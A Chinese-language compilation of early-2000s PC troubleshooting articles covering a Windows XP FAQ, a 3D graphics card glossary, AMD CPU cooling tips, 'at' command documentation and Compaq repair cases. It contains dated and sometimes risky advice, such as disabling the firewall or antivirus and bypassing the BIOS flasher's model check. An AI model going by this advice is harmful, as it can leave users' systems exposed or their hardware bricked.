选项卡中允许你添加新的访问用户，则可以忽略上面的操作。单击“OK（确定）”按钮返回，现在就可以访问原来加密的文件夹，或者磁盘了。此外，如果你在“Pemissions”选项卡中看到了一个很长的“S-1-5-21-xxxxx”等全部是数字组成的用户，这可能就是以前创建的用户名，但是它已经损坏了，选择该用户，清除界面中的“Inherit from part the permission entries that apply to child objects. Inculde these with entries explicitly defined here（从父项继承那些可以应用到子对象的权限项目，包括那些在此明确定义的项目）”复选框。在关联的界面中选择“Copy（复制）”命令，之后可以将这个无用的用户删除。

[我安装了Windows XP，在“添加/删除程序”里没找到制作启动盘的程序，我该怎么办？]

    在Windows XP中并没有自带制作启动盘的程序，需要使用其他工具才能实现，你可以在以下地址下载到相应版本的制作工具。

    家庭版本 http://go1.163.com/xiaolh/winxp3/20020117/20020117A.htm

    高级版本 http://go1.163.com/xiaolh/winxp3/20020117/20020117B.htm

    在使用中需要注意的是，此程序做的启动盘只能供Windows XP使用，并且要使用此程序你需准备6张格式化的空白1.44MB高密度软盘，其中第一号盘就可以用来启动计算机。

    [为何我在DOS下安装Windows XP 很慢？]

    你一定没有在安装前运行smartdrv.exe,如果不运行这个，可能一个晚上你也安装不完。Smartdrv.exe在windows 98/me的光盘或是windows/command/里有。

    [为何安装过程中系统提示我必须转化分区为NTFS]

    这是因为你在windows 下安装的时候安装的不仔细，刚开始安装的时候有个高级-再安装过程中允许我选择安装到的分区。重新运行安装程序，记得选择这个，然后重新启动后就可以选择安装到的分区和是否保留原分区格式，或是格式化为NTFS OR FAT32等等。

    [为何我安装了 Windows XP 关机总是变成重起]

    这个问题是有些主板的高级电源管理不能被Windows XP支持。一般用AWARD的BIOS的主板的电脑没有这个问题，到目前为止，遇到AMI的BIOS的主板有这个问题，如技嘉的主板。解决的办法是升级你的主板的BIOS，即刷新BIOS,这是个比较危险的操作，最好请经验丰富的人来帮助你。

    [为何我的QQ在 Windows XP下运行很慢]

    这个问题好像是早期版本的QQ和Windows XP不大兼容，现在的QQ没有这个问题了。

    [为何我的Windows XP 下的Internet Explorer 运行很慢]

    如果你的机器CPU和内存够用的话，一般没这个问题。不过我发现，如果你对IE的高级选项里的东西做了改动，如一些效果等等，本来关掉这些效果为了加速IE,其实，这时就会出现IE运行很慢，尤其是显示上面的菜单和工具栏的时候。最简单的解决办法就是高级选项的面板上，点击默认，使用IE默认的设置即可。

    [为何我的 Windows XP 安装了简体中文语言包后还是英文的]

    到控制面板，地区区域选项，菜单显示，选择简体中文即可，注销后重新登录即可。如果你不选择所有用户都使用这个配置的话，你会发现，其它用户里面还是英文界面的。

    [为何MPEG4格式AVI在Windows Media Player 8.0 不能放]

    有时候用Media player放avi的时候只有声音没有图像，或是不能放，这是由于缺少解码器的原因www.divx.com 下载安装divx即可。

[不知什么原因，进不了windows。经过了n次开机后可以进入，用ghost还原c盘，当进行了90%左右就死机，重启，便显示：
em disk
Disk I/O error
Replace the disk,and then press any hey
连format也用不了，也显示上面的内容，该怎么办啊？ ]

解决方法
1. 一台电脑开机显示：em disk. Disk I/0 error,按英文的理解，应是硬盘物理上出错。用win98磁盘启动，在A：>提示下，键入sys c:回车，运行chkdsk c:/f,再运行scandisk c:，重新启动后可顺利进入win98
2.快速拯救无法正常启动Win98的方法

    开机查看，显示如下信息：
    Starting Windows 98…
Unknown Flash Type.
em disk
Disk I/O error
Replace the disk, and then Press any key.

    这是我第二次遇到同样的故障了。记得上次我曾先对硬盘进行分区、格式化，又重新安装了Windows 98系统及部分常用软件，花费了好几个钟头，尤其是安装这台机器的旧声卡驱动程序更是费了好大劲，难道这次又要重复一遍上次繁杂的步骤？一想起这些就有点不寒而栗，于
是我决定找到一个更简便的解决办法。

    我先尝试从软盘引导，成功，又试着进入C盘，用DIR命令可列出文件目录，疑是C区上的引导文件被破坏，便执行了“SYS A：C：”命令传递系统，完成后重新启动机器，故障依旧。

    我想，硬盘无法引导，一般跟硬盘的主引导扇区出了问题有很大关系，而且我还依稀记得用“FDISK/MBR”命令可修复大部分硬盘的主引导扇区，何不赶快试试！于是立即从软盘启动，先执行了“FDISK/MBR”命令，再用“SYS A：C：”传递系统文件，完成后重启电脑，C盘果然
引导成功。可遗憾的是此时只能进入DOS状态，无法继续启动Windows 98。再仔细查看系统引导文件，发现其中的MSDOS.SYS的字节数小了许多，修改此文件的属性后用EDIT查看其内容，果然少了许多命令行。我马上从另一台能正常启动的机器COPY了一个MSDOS.SYS文件，再次重
启电脑，终于出现了Windows 98的界面，而且系统也恢复如初了。

[为何安装了Windows XP后，我的其它操作系统里的Norton antivirus 2001不能用了]

    这个是由于Norton2002以前版本的Norton杀毒软件和Windows XP不兼容，而且要命的是这个不兼容是由于新版的操作系统的ntldr,ntdetect.com, 冲突造成的，如果你不用旧版的文件代替，即使删掉Windows XP也没用的。解决办法是到symantic的网站下载补丁，或是使用norton2002,目前norton antivirus 2002可以很好的在XP下运行。

    [为何PS手柄驱动不能在XP下用]

    这是手柄的驱动程序不支持XP造成的，更换手柄驱动程序可以解决www.topcmm.com下载后，如果运行setup安装不成功，用添加删除新硬件安装驱动。

    [关于局域网里Windows XP 的网上邻居不能访问的问题]

    Windows XP的安全性提高，默认不启用NBT.有时候，在局域网里使用自带的防火墙会出现的访问问题，关掉防火墙即可。

    [关于Windows XP下的显卡驱动问题]

    Windows XP自带了FOR NVIDIA系列的显卡驱动程序一般没有问题，而目前的新版的雷管XP驱动在某些机器上安装后会出现问题，建议大家使用系统自带的驱动。NVIDIA对雷管驱动已经做了更新。

    [Windows XP 安装好后，如何把FAT 32转化为NTFS]

    使用convert命令，在命令行模式下用convert.exe这个命令随时转化的。例如：convert c: /fs:ntfs把c盘转化为NTFS.

    [Windows XP下如何创建启动软盘]

    插入软盘，然后在软盘驱动器的图标上点击右键，弹出菜单选择格式化，在格式化窗口里最下边选择创建MS-DOS启动盘即可。

    [我先安装了Win XP，它没有提供双引导选项。我还想再装一个Win98，如何把Win XP的双引导菜单调出来？]

    你可在Win XP基础上直接安装Win98，完成之后只能进入Win98。此时运行Win XP的安装程序，选择“修复安装”即可。再次启动即出现双引导菜单。

    [是否所有的XP都要激活？如果不激活可不可以用？那要怎么样激活？]

    在Windows XP操作系统中，微软采用了一种“激活”技术。要求使用XP的用户在首次安装系统后的30天内，通过互联网或电话，将系统根据用户硬件配置生成的一组代码和Windows自带的序列号向微软的激活中心注册，否则XP将自动锁定。激活后如果用户多次更换系统硬件或购买新的机器后，也都必须重新激活。这项技术的实质在于保证微软授权的每一个Licence（认证）都只能在一台机器上使用，从而防止盗版商只用一个序列号就能生产出大量盗版XP的现象。

    [我的电脑是双系统，Win98在C盘，Win XP在D盘。如果要格式化C盘重装Win98，在不重装Win XP的情况下，有什么办法恢复双启动？]

    只管格式化C盘重新安装Win98好了，安装完成你会发现失去双引导菜单，而失去双引导则意味着无法启动XP。不要紧，重新运行XP的安装程序，选择“修复”安装即可。放心，“修复”安装并非意味着重新安装。

    [在局域网里如何让Windows 2000访问Windows XP？]
    先在Windows XP控制面板->用户帐号中添加新的用户，设置好权限之后就可以在Windows 2000里以新添加的用户名与密码来访问Windows XP了。如果你使用的XP是Professional版本，也可以开放guest权限，这样就不需要再新添加用户，任何机器都可以访问XP了。

[我有一个Dell的USB 9985键盘，结果在Win98的纯DOS模式下不能够使用，而在Win98和Win XP里面使用正常。怎么办？]

    USB设备一般都需要驱动的，9985键盘是USB键盘，所以要先驱动USB端口，在CMOS里面可以进行此项工作，一般CMOS中的Chipset Features里面都有USB KB/Mouse Legacy选项，选择Keyborad就可以了。有的主板可能是选择Enable或者Disable对usb 鼠标和键盘的支持。设置
成Enable能解决。

    [为何我的Modem不能在XP下工作？]

    这个主要是因为驱动程序的问题。很多Modem的Win 2000驱动程序也不能在XP下用了，不过倒是有些Modem的Win98的驱动程序可以在XP下用。

    [我现在是用的是Win Me，可以直接升级到XP吗？]

    Windows XP在升级安装上做得十分出色，它的安装方式有三种：升级安装、双系统共存安装和全新安装。我们可在以前的Windows 98/Me/NT4/2000这些操作系统的基础上顺利升级到Windows XP。注意，Win 95、Win NT 3.51以及再早一些的Windows系统是不能升级到Windows
XP的。

    [我最近碰到一个问题，当我安装好Win98后，再安装Win 2000或XP的时候，总是在拷贝完文件后跳回或是死机，为什么？]

    Win98是基于DOS的操作系统，尤其是因为要管理好内存，Win98会在CONFIG.SYS里加载HIMEM.SYS和EMM386.EXE，即使无CONFIG.SYS，Win98也会在图形界面初始化的时候加载HIMEM.SYS。而这两个管理基本内存的文件，带有多种参数，不同的配置会带来不同的内存分配环境。当然，系统过热比如风扇停转的时候，也会表现出这些症状，您应该首先检查硬件的基本情况如风扇和连线的正常与否。如果你的系统是超频的又不能正常安装话，请降低回正常的频率后再安装Win 2000和XP，成功率较高些。

    [系统关机过程中有时在屏幕显示"Saving your Settings"（保存设置）的信息时会出现死机现象]

    可从Windows升级产品目录中获得升级补丁。从StartàAll ProgramsàWindows Update中选择PersonalizeWindows Update，点击Display the Link。

    [Outlook Express ]

    当老版本的Windows操作系统升级至Windows XP后，文件及设置转移向导程序可能丢失统计数据或原有统计数据被新数据覆盖。如果在Windows9X/Me系统上运行Windows XP的Outlook Express程序，信息存储功能可能失效。 可升级补丁

    [光盘刻录]

    使用Windows XP系统刻录的光盘在Windows95/98系统操作环境或是在MP3播放器上无法读取或丢失部分文件或文件夹。 可相关升级补丁。

    [电源管理 ]

    不支持Pentium III和Athlon的CPU电源管理功能，导致使用这两种类型CPU的笔记本电脑能耗消耗较大。可升级补丁。

最近我的Windows XP系统会突然死机怎么办?

最近我的Windows XP系统会突然死机。由于一个小时就死机一次，正在编辑的文件也会因此而丢失，无法正常工作。请问有没有什么好的解决方法？

原因可能在于最近安装的软件和外设。卸载这些软件和外设、或者使用系统工具就可以解决。

    与Windows 98/98 SE/Me相比，XP不会轻易死机。即使增加常驻内存的软件，或者使用复杂的壁纸和屏保，一般也不会因此而死机。因为旨在确保系统稳定的“资源”非常充足。

    而且，即使死机，也基本上不会影响到整个系统，只要关闭有问题的软件，基本上都能顺利解决。

    但是，Windows XP也会因各种原因而导致系统不稳定，或者经常发生死机现象。

    产生这种现象的原因可能是因为个人电脑BIOS和Windows系统没有更新到最新版本。对于前者，可以参考个人电脑制造商网页，看看有没有需要下载的内容。后者则必须运行“Windows Update”，下载最新数据。

    如果这样还无法解决问题，可以从如下几点入手解决。

列出可能导致这一问题的软件和设备，重新安装驱动程序

    比如，如果安装新软件时正赶上常驻软件起动，而导致新软件无法正常安装，这种情况有时会导致死机。

    安装特定软件后系统运行马上出现不正常现象时，最好删除该软件，重新安装。

    删除软件时依次选择“开始”、“控制面板”、“添加和删除程序”选项，打开添加和删除程序窗口，然后选择删除软件即可。

    重新安装时，尽量在关闭常驻软件后再开始操作。尤其是在把防病毒软件设置为有效时，有时更容易出现无法正常安装的现象。因此，最好在安装过程中将防病毒软件设置为无效（为了防止病毒感染，在此期间必须关闭邮件软件的自动接收功能）。

    如果在安装或更新某些外设（如鼠标和扫描仪）驱动程序后，系统运行不正常，一般情况下问题出在外设的驱动程序上。

    这时有可能是安装方法不正确，或者安装了不合适的设备驱动程序。此时必须重新安装，或者恢复成原来的设备驱动程序。

    删除设备驱动程序时，依次选择“开始”按钮、“控制面板”、“系统”、“硬件”选项下的“设备管理器”按钮，打开“设备管理器”窗口，然后选择所要删除的外设，单击鼠标右键，最后点击“删除”按钮即可。

    另外，恢复成原来的设备驱动程序时，先在上述“设备管理器”窗口中选择所需外设，然后双击。接着在“设备”窗口中“设备还原”按钮即可。

使用“系统恢复”功能

    删除软件和设备驱动程序后系统运行情况仍然不正常时，可以使用“系统恢复”功能。该功能是指先设置个人电脑此前正常运行的某个日期，然后将系统恢复到当时的状态。

    如果进行系统恢复，软件及外设注册信息都将恢复到当时的状态。因此建议预先删除指定日期以后安装的软件。恢复后再重新安装这些软件。

    不过，指定日期以后输入的文档文件和数据文件不会被删除或恢复，因此用户不需担心这些文件。

    恢复系统的操作步骤如下：依次选择“开始”按钮、“全部程序”、“附件”、“系统工具”、“系统恢复”。在“将计算机恢复成以前的状态”窗口中点击“下一步”按钮。

    此时会显示日历，点击所要恢复的日期。由于可恢复的日期为粗体显示，可以从中选择。之后，点击“下一步”按钮，根据画面说明操作，最后重新起动Windows即告完成。

    如果经过上述操作仍无法解决问题，就有可能是部分Windows系统已经破坏。最后的办法就是重新安装Windows系统，或者利用恢复光盘进行系统修复。


3D图形加速卡术语

《一键清理系统垃圾》

3D图形加速卡术语

    随着3D技术的发展，3D应用软件(尤其是3D游戏软件)的大量涌现，使得3D图形加速卡成为大家谈论的一个热点，近年来，随着硬件技术的高速发展，以及微软Direct 3D的出台，更加快了3D图形加速卡大量面市的步伐。以往只能在高档图形工作站和专用电脑中见到的这类图形卡，今天已逐渐走进我们的办公室和家庭。相信3D图形加速卡很快便会成为继声音卡和CD－ROM之后的多媒体电脑的又一标准配置。

    我们在了解3D加速卡及其相关技术时，往往会频繁遇到一些抽象的术语，本期特推出“3D图形加速卡术语大放送”一文，帮助你快速跨入3D之门。

    ●3D API （3D应用程序接口）

     API是Application Programming Interface的缩写。API是许多程序的集合，一个3D API 能让编程人员所设计的3D软件只要调用API内的程序，API就会自动和硬件的驱动程序沟通，启动3D芯片内强大的3D图形处理功能。目前几种主流的3D API有Direct X、OpenGL、3DR、 RenserWare 、 BRender 、 Glide/3Dfx 及QuickDraw 3D Rave等。

    ●Direct X

    微软公司专为PC 游戏开发的API ， 特点是：比较容易控制，可令显示卡发挥不同的功能，与Windows 95 和Windows NT操作系统兼容性好， 而且目前基本上是免费使用的（以后就难说了）。在Direct X 5. 0 中共分六个部分: DirectDraw管理游戏的视频输出、Direct3D管理游戏的3D图形、DirectPlay 管理游戏的网络通讯、 DirectSound 管理游戏的声音输出、 DirectInput 管理游戏的摇杆控制、DirectSetup 管理游戏的安装。

    ●OpenGL （开放式图形界面）

    由Silicon Graphics公司（即大名鼎鼎的SGI）开发，能够在Windows 95、Windows NT、 Macos 、Beos、OS/2、以及Unix上应用的API。 它除了提供许多图形运算功能外，也提供了不少图形处理功能。由于OpenGL起步较早，一直用于高档图形工作站，其3D图形功能很强，超过Direct X许多，可最大限度地发挥WooDoo、POWER VR等超级3D芯片的巨大潜力。因此许多游戏开发公司和图形软件开发公司强烈要求微软公司在Window的下一个版本中加入对OpenGL的支持。目前，这一合理要求已经被微软公司接受，他们将在Windows 98中同时支持Direct X和OpenGL。

    ●ALPHA BIENDING （ALPHA值后处理）

    简单地说这是一种让3D物件产生透明感的技术。一个在屏幕上显示的3D物件，每个像素中通常附有红、绿、蓝（RGB）三组数值。若3D环境中允许像素能拥有一组 Alpha值，我们就称它拥有一个Alpha Channel。Alpha值记载像素的透明度。这样一来使得每一个物件都可以拥有不同的透明程度。Alpha blending这个功能，就是处理两个物件在屏幕画面上叠加的时候，将Alpha值考虑在内， 使其呈现接近真实世界的效果。

    ●Anti－aliasing （抗锯齿处理）

    应用调色技术将图形边缘的“锯齿”缓和，在视觉上得到一种平滑边缘的效果。

    ●DEPTH CUEING （景深效果处理）

    景深效果处理则是当物件远离观测者时，降低物件颜色与亮度的一项功能。例如，当一个物体离我们的视线越来越远时，它看起来就会越来越模糊。

    ●FOG EFFECT （雾化效果处理）

    顾名思义，它的功能就是制造一块指定的区域笼罩在一股烟雾弥漫之中的效果，程序设计师可以自由调整雾的范围、程度、颜色等参数，再交由3D芯片负责将结果计算出来。

    Depth Cueing和Fog Effect功能， 对于决定“立体空间”的外观显示有相当大的帮助，让虚拟出来的世界更加接近真实的世界。

    ●HEIDI

    Heidi的定位在开发3D图形应用的许多方面， 它扮演着协调动作的重要角色，是由Autodesk公司提出来的规格。就图形处理工作的管理方面，如算图、着色、复制等作业，以及内部的信息传输，Heidi 提供给应用软件一种动态化组织架构的管理方式。目前，采用 Heidi 系统的应用程序，有Kinetix的3D Studio MAX动画制作程序，和Autodesk为 AutoCAD R13开发的WHIP加速驱动程序。

    ●MIP MAPPING （贴图处理）

    在显示3D图像时，MIP贴图处理非常重要。 这项材质贴图的技术，是依据不同精度的要求，而使用不同版本的材质图样进行贴图。当物件移近或远离观测者时，会在物体表面贴上相对应的材质图案，于是让物体呈现出更加真实的效果。例如：物件逐渐远离，依据这种处理方式，程序就会贴上较单纯、细致度较低的材质图样，进而提高图形处理的整体效率。

    ●SHADING：FLAT，GOURAUD，AND TEXTURE MAPPING （着色处理：平面着色、 高氏着色及材质贴图）

    绝大多数的3D物体是由多边形（polygon）所构成的，它们都必须经过某些着色处理，才不会以线结构（wire frame）的面目示人。Flat shading是最简单，也是最快速的着色方法，每个多边形都会被指定一个单一且没有变化的颜色。这种方法虽然会产生出不真实的效果，但非常适用于快速成像作业（quick rendering）及其它要求速度重于细致度的场合。Gouraud Shading就稍为好一点。在多边形上的每一点都会被指定一组色调（hue）值， 同时将多边形着上平顺的渐层色。

    ●TEXTURE MAPPING （材质贴图）

    是在物体着色方面最引人注目，也是最拟真的方法，同时也多为目前的游戏软件所采用。一张平面图像（可以是数字化图像、小图标或点阵位图）会被贴到多边形上。

    ●VIDEO TEXTURE MAPPING （动态材质贴图）

    是目前最好的材质贴图效果，具有此种功能的图形图像加速卡，采用高速的图像处理方式，将一段连续的图像（可能是即时运算或来自一个AVI或MPEG的档案）以材质的方法处理，然后贴到3D物件的表面上去。例如在赛车游戏中，在挡风玻璃上贴一段连续的天空动画，就能做出类似即时反射环境贴图的效果。

    ●PERSPECTIVE CORRECTION （透视角修正处理）

    要让一个经过材质贴图处理的3D物件具备相当真实的外貌，这项处理不可缺少。它采用数学运算的方式，以确保贴在物件上的部分影像图会向透视的消失方向贴出正确的收敛。由于这项工作十分依赖处理器，所以对新一代的3D加速器而言，这个功能也是相当重要。有了它，3D加速器才能保持图形的真实效果。我们以风靡世界的3D冒险游戏《古墓丽影2》中的图形为例，在图一中由于关闭了3D加速卡上“透视角修正”功能，人物所站的石板地面线条出现严重的弯曲变形；而图二中打开了3D加速卡上“透视角修正”功能，石板地面线条便保持了真实的效果。

    ●TEXTURE MAP INTERPOLATION （材质影像插补处理即滤化处理）

    当材质被贴到屏幕所显示的一个3D模型上时，材质处理器必需决定每个图素要贴到的像素位置。由于材质是2D图片，而模型是3D物件，所以图素的范围与像素范围通常不能很好吻合。此时要解决这个像素的贴图问题，就得用插补处理的方式来解决。而这种处理的方式共分三种：Nearest Neighbor，Bilinear以及Trilinear。

    ●NEAEST NEIGHBOR （近邻取样处理）

     是一种较简单的材质影像插补的处理方式。使用包含像素最多部份的图素来贴图。这种处理方式速度比较快，常被用于3D游戏开发，不过图形的品质较差。

    ●BILINEAR LNTERPOLATION （双线性插补处理）

    是一种较好的材质影像插补处理方式，能够先找出最近像素的四个图素，然后在它们之间作差补效果，最后产生的结果才会被贴到像素的位置上，这样，可以避免看到大块的像素呈现到萤幕上，就像在观察近距离图形时常常出现的“马赛克”现象。这种处理方式适用于有一定景深的静态影像，不过无法提供影像的最佳品质，同时也不适用于移动中的物件。我们还是采用《古墓丽影2》的图像来说明：在图三中，由于关闭了3D加速卡上的“双线性插补”功能，在人物身后左边的木桩上出现了明显的“马赛克”现象。而在图四中，我们将3D加速卡上“双线性插补”功能打开，于是木桩上的“马赛克”现象消失了。

    ●TRILNEAR LNTERPOLATION （三线性插补处理）

    是一种更复杂的材质影像插补处理方式。会用到相当多的材质影像，而每张的大小恰好会是另一张的四分之一。例如：有一张材质影像是512×512个图素，第二张就会是256×256个图素，第三张便是128×128个图素．．．等等，最小的一张是1×1，使用这些多重解析度的材质影像，当遇到场景较深、较大时（如飞行模拟），就能提供高品质的贴图效果。三线性插补处理比双线性处理需要更大的计算量，而且需要更大的存储器时钟带宽。但是Trilinear Interpolation可以提供最高的贴图品质。

    ●FRAME RATE （画面更新率）

    荧光屏上画面更新的速度，其单位为FPS（帧每秒），FPS越高画面越流畅。

    ●FRAME BUFFER （图形画面缓冲区）

    该区域主要用于存储可显示的图形信息， 它决定了可显示的最高分辨率与最大彩色数量。

    ●DOPTH BUFFERING （双重缓冲区处理）

    绝大多数支持OpenGL的3D加速卡都会提供两组图形画面信息，一组显示，另一组备用，这两组图形画面信息通常被看着front buffer和back buffer。这项功能让显示卡用front buffer存放正在显示的这格画面，而同时下一格画面已经在back buffer待命。 然后显示卡将两个buffer 互换，back buffer的画面显示出来，且同时再在front buffer中画好下一格待命，如此形成一种互补的工作方式，迅速对画面的快速改变做出反应。

    ●RAMDAC （存储器数模转换速度）

    表示将存储器图形数据转换成显示器上可见的像素光点的转换速度， 单位为MHz。其工作速度越高，频带越宽，高分辨率时的画面质量越好。

    ●Z BUFFER （Z 缓存）

    在3D环境中，每个像素会利用一组数据资料用来定义像素在显示时的纵深度（即Z轴座标值）。Z Buffer所用的位数越高， 则代表该显示卡所提供的物件纵深感也越精确。一般的3D加速卡仅能支持到16位或24位的Z Buffer，对于普通的3D模型而言这也算足够了，不过高级的3D卡更可支持到32位的Z Buffer。对一个含有很多物体连接的较复杂的3D模型，能拥有较多的位数来表现深度感是相当重要的，能避免闪烁现象发生。

    ●Z－BUFFERING （Z 缓存处理）

    Z－Buffering是在为物件进行着色时， 执行“隐藏面消除”工作的一项技术，使隐藏物件背后的部份不会被显示出来。


AMD+VIA的一箩筐问题

《一键清理系统垃圾》

AMD+VIA的一箩筐问题

一、龙的安装

龙风扇的安装是你想使用龙的第一个问题，你必须注意到DIE上四个小角，如果你想把风扇用力的压在CPU上，如果你用力并没有很均匀，你的CPU很可能就这样完蛋了，更可怕的是这样的硬伤你是不要想到JS那里得到退换了。以前涡轮类的风扇尽管有着很好的散热效果，但是它的扣具也是最不适合于龙的，想用龙，保险起见，就不要用涡轮。

其实你也没有必要因为你的龙上有一点点的硬伤，你就害怕，这并不能注定你的龙彻底的完蛋。有硬伤只是说明外表受到了损害，但是它的内部很有可能并没有任何问题。话说回来，如果有JS给你拿了一颗龙，你一定要仔细的先检查一番，不要给自己留下遗憾。

一个龙专用的风扇是你的首选。

二、龙的温度

传说中龙的温度都是很高的，速龙、雷鸟的发热都很大，事实上只是有很大一部分的龙发热高，这部分发热高的龙所占的比例要远高于INTEL的CPU。不要以为一颗PIII工作在48度，你的毒龙也能稳定工作在48度。曾经有一次我的PIII800EB在我不经意时，忘记了插上风扇，并且疯狂的打了3个小时的《三角洲》，并没有感觉到一点点的不稳定。等到我意识到自己的风扇没有安装时，CPU已经高达了78度。不过我们一般不用担心intel的cpu 烧掉，因为intel的cpu里有温度的保护电路，而amd没有！所以……大家小心为好！

一般说来毒龙的温度应该控制在40-45度左右。当毒龙工作在50度时，就开始非常的不稳定，如果它的温度到了52度，你就很难进入WIN98了，如果他再高些，比如55度，（我没见过这么高啊！呵呵）由于CACHE比毒龙大，雷鸟可以稳定工作在60度左右。


at命令的用法

《一键清理系统垃圾》

at命令的用法

At
列出在指定的时间和日期在计算机上运行的已计划命令或计划命令和程序。必须正在运行“计划”服务才能使用 at 命令。

at [\\computername] [[id] [/delete] | /delete [/yes]]

at [\\computername] time [/interactive] [/every:date[,...]| /next:date[,...]] command

参数

无

如果在没有参数的情况下使用，则 at 列出已计划的命令。

\\computername

指定远程计算机。如果省略该参数，命令将安排在本地计算机。

id

指定指派给已计划命令的识别码。

/delete

取消已计划的命令。如果省略了 id，计算机中已计划的命令将被全部取消。

/yes

当删除已计划的事件时，对系统的查询强制进行肯定的回答。

time

指定运行命令的时间。将时间以 24 小时标记（00:00 [午夜] 到 23:59）的方式表示为小时：分钟。

/interactive

允许作业与在作业运行时登录用户的桌面进行交互。

/every:date[,...]

在每个星期或月的指定日期（例如，每个星期四，或每月的第三天）运行命令。将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su)，或月的一天或多天（使用 1 到 31 的数字）。用逗号分隔多个日期项。如果省略了 date，将假定为该月的当前日期。

/next:date[,...]

在重复出现下一天（例如，下个星期四）时，运行指定命令将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su)，或月的一天或多天（使用 1 到 31 的数字）。用逗号分隔多个日期项。如果省略了 date，将假定为该月的当前日期。

command

指定要运行的 Windows 2000 命令、程序（.exe 或 .com 文件）或批处理程序（.bat 或 .cmd 文件）。当命令需要路径作为参数时，请使用绝对路径，也就是从驱动器号开始的整个路径。如果命令在远程计算机上，请指定服务器和共享名的 UNC 符号，而不是远程驱动器号。如果命令不是可执行 (.exe) 文件，必须在命令前加上 cmd /c，例如：

cmd /c dir > c:\test.out


Award Flasher 5.33有什么新的功能？

《一键清理系统垃圾》

Award Flasher 5.33有什么新的功能？

     Award BIOS的二进制数据文件的文件名一般是和BIOS系列号一致的。因为文件名的类似，用户可能偶然失误使用错误的数据文件。为了避免这个问题，在新版的AWDFlash.EXEversion5.33增加了检测的功能，如果它发现用户使用的数据文件和主板的型号不符就报警，报警信息是：“Theprogramfile'spartnumberdoesnotmatchwithyoursystem”。如果你认为自己不会犯这样的错误，可以用“/Py”PASS掉检测功能：AwdFlash2Axxxxxx.BIN/Py


Compaq电脑维修两例

《一键清理系统垃圾》

Compaq电脑维修两例

    笔者在使用Compaq电脑的过程中曾遇到过如下的问题，它一度使笔者焦头烂额（几欲低级格式化硬盘），由于有关Compaq原装机的维修资料很少，有些电脑杂志提到也是蜻蜓点水，上网求救也无结果，最后发现原来如此.....现将自己的一点心得写出来与大家分享，同时也希望使用Compaq机的朋友在遇到类似问题时少走弯路，少浪费时间。我的机器为Compaq Presario 4100 Series（ Comqaq 586原装机），Pentium 120 CPU，Quantun Bigfoot 1.2 G 硬盘。
    故障现象1：启动机器时，屏幕出现如下提示：“None－system disk or diskerror，replace and strike any key when ready。”用WIN98系统盘启动，屏幕上出现如下提示：
    1.The drive may need to be partitioned to create a partition on the drive run fdisk from the MS－DOS command prompt.
    2.You may using third－partion if you are using this type of software remove the Emergency Boot Disk and restart your computer.Then follow the on－screen insstructions to start your computer from a floppy disk.
    3.Some viruses also cause your drive c to not register .You can use a virus scaning program to ckeck your computer for viruses.The diagnostic tools were successfully　load to drive c.
    在C盘目录下运行Fdisk命令，出错信息为：“No fixed disks present”。
    故障解决：显然系统不认盘，即硬盘丢失。因为出现该情况前曾在网上下载过东西，遂怀疑是病毒所致。首先想到的是杀毒，但现在的问题是连硬盘都找不到，当务之急是找回硬盘。突然想到前几天由于进入CMOS时不知道密码，故对CMOS 放电，估计是CMOS 参数丢失所致，然而当进入CMOS 时又遇到问题，当机器启动时（屏幕右上角出现比较粗的光标时），按下F10键（一般兼容机是按下DEL 键进入CMOS 设置，而COMPAQ机是按F10键），计算机没反应，不能进入CMOS 设置。
    因为COMPAQ机器的BIOS设置信息存放在硬盘的NON－DOS分区上（约5MB～10MB大小，这与大多数机型固化在主板上不同），由于装系统重新分区时人为地将该分区删掉了，故硬盘上不再有存放系统信息的NON－DOS分区，也就不能进入CMOS了。本人所在的实验室有两台同样的COMPAQ机器，于是进入另外一台机器的Computer Setup，这时可以看到一个“Welcome to Compaq Utilites”的界面，按OK按钮出现一个Compaq Utilites的菜单，选择其中的“Create a diagnostics diskette”项（事先插入一张空白软盘，用来生成诊断盘）。将生成的诊断盘插入待修的机器软驱中，重新启动计算机，自动进入 CMOS设置状态，在Compaq Utilites菜单中选择Computer Setup项（注意：如不知道密码，你仍然可以进入Computer Setup，但只有看的分儿，不能对其中的设置进行操作，要修改设置只好用给CMOS放电这一招了）。在出现的界面中点击Storage 旁的图标，将弹出一个Storage 的界面，然后点击“Configure Hard Drives” 按钮，将硬盘的参数设置正确。注意，COMPAQ机的CMOS 设置比较麻烦，你只需按“Cylinder” 右侧的增加或者减少按钮，将硬盘容量设置成与你的硬盘的实际容量相符即可，其余项最好不要改，修改后存盘退出，取出软盘，重新启动计算机，硬盘即可找回。尽管找回了硬盘，但是硬盘上由于分区时将NON－DOS分区丢掉了，所以启动时仍然进不了CMOS 设置，当然也就改变不了CMOS 设置，要恢复硬盘上的NON－DOS 分区信息，可采用随机附带的QUICKRESTORE盘（软盘、光盘各一张）来恢复计算机系统的最初信息（这也是最彻底的恢复方法）。
    注意，用 QUICKRESTORE软盘来快速恢复系统时，硬盘上的所有信息将全部丢失，重要信息一定要进行备份!具体操作可按照QUICKRESTORE的使用指南进行操作。
    故障现象2：笔者在解决了问题1后，格式化硬盘（分区时当然保留NON－DOS 分区）将系统升级到WIN98，装机后出现下面的“症状”：机器偶尔能正常启动（在2～5分钟以内），但通常情况下要20多分钟（甚至30分钟）才能启动，并且容易出现这样的现象：出现WIN98启动界面后长时间处于等待状态，大约一刻钟左右，硬盘停止转动，继续等待5～10 分钟后硬盘重新转动，在网络登录框中输入密码后，桌面出现一些图标后机器无响应，按下CTRL ＋ALT ＋DEL，提示：“msgsrv32（\windows \system目录下）无响应”，结束该任务后，Windows正常进入，但是我想该程序在运行某些应用程序时一定有用，用其他机器上的该可执行文件覆盖后问题依旧。
